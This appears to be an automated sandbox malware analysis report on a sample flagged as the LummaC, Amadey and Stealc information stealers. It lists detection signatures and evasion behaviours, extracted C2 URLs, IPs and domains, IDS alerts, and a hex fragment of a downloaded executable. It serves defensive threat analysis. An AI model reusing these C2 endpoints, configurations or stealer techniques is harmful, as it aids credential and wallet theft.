Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1541396
MD5: 19ca4c1711e487e5c93a66f3e5398c92
SHA1: 34fac47faf40a8013ddd39d5c391d503c5b04db9
SHA256: 03617a6fe46419e212fea056d6e43a0abff7a41dbf9de0896ea6c264b4728622
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000003.00000002.2329238363.0000000000D11000.00000040.00000001.01000000.00000006.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 5.2.RLX7QEJ1ATLQN8ECDIPHB.exe.d0000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 09d417a7c4.exe.7836.11.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["dissapoiznw.store", "studennotediw.store", "licendfilteo.site", "spirittunek.store", "eaglepawnoy.store", "clearancek.site", "mobbipenju.store", "bathdoomgaz.store"], "Build id": "4SD0y4--legendaryy"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe ReversingLabs: Detection: 44%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 44%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49979 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49989 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49994 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49997 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:50000 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:50004 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:50013 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:50014 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:50018 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50028 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50031 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50059 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50060 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50065 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:50074 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50092 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50093 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50097 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe, 00000007.00000003.2338491843.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe, 00000007.00000002.2471724007.0000000000C52000.00000040.00000001.01000000.0000000B.sdmp
Source: firefox.exe Memory has grown: Private usage: 1MB later: 188MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:62647 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:58388 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:59774 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:58230 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:58170 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:56704 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:54851 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:54020 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49942 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49774 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:62960 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49955
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:50757 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:51004 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:55170 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:58181 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:62392 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:57594 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:54725 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50001 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49998 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50003 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49974 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:62322 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:49923 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:58389 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:56490 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:58019 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:59280 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50010 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:56120 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50015 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50039 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:59483 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:51864 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:63036 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:59774 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50048 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:63697 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:56211 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:58566 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50114 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50044 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:60387 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:64190 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50078 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49706 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49707 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49707 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49708 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49712 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49716 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50000 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:50014 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49989 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49989 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49979 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:50074 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49994 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50018 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49994 -> 104.21.53.8:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: dissapoiznw.store
Source: Malware configuration extractor URLs: studennotediw.store
Source: Malware configuration extractor URLs: licendfilteo.site
Source: Malware configuration extractor URLs: spirittunek.store
Source: Malware configuration extractor URLs: eaglepawnoy.store
Source: Malware configuration extractor URLs: clearancek.site
Source: Malware configuration extractor URLs: mobbipenju.store
Source: Malware configuration extractor URLs: bathdoomgaz.store
Source: Malware configuration extractor IPs: 185.215.113.43
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 17:29:23 GMTContent-Type: application/octet-streamContent-Length: 1934848Last-Modified: Thu, 24 Oct 2024 17:07:23 GMTConnection: keep-aliveETag: "671a7ecb-1d8600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 80 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 4c 00 00 04 00 00 b6 c5 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 6a 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6a 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2b 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 70 62 77 79 6e 69 72 00 70 1a 00 00 00 32 00 00 6c 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 78 64 63 73 75 63 6b 00 10 00 00 00 70 4c 00 00 04 00 00 00 60 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 4c 00 00 22 00 00 00 64 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 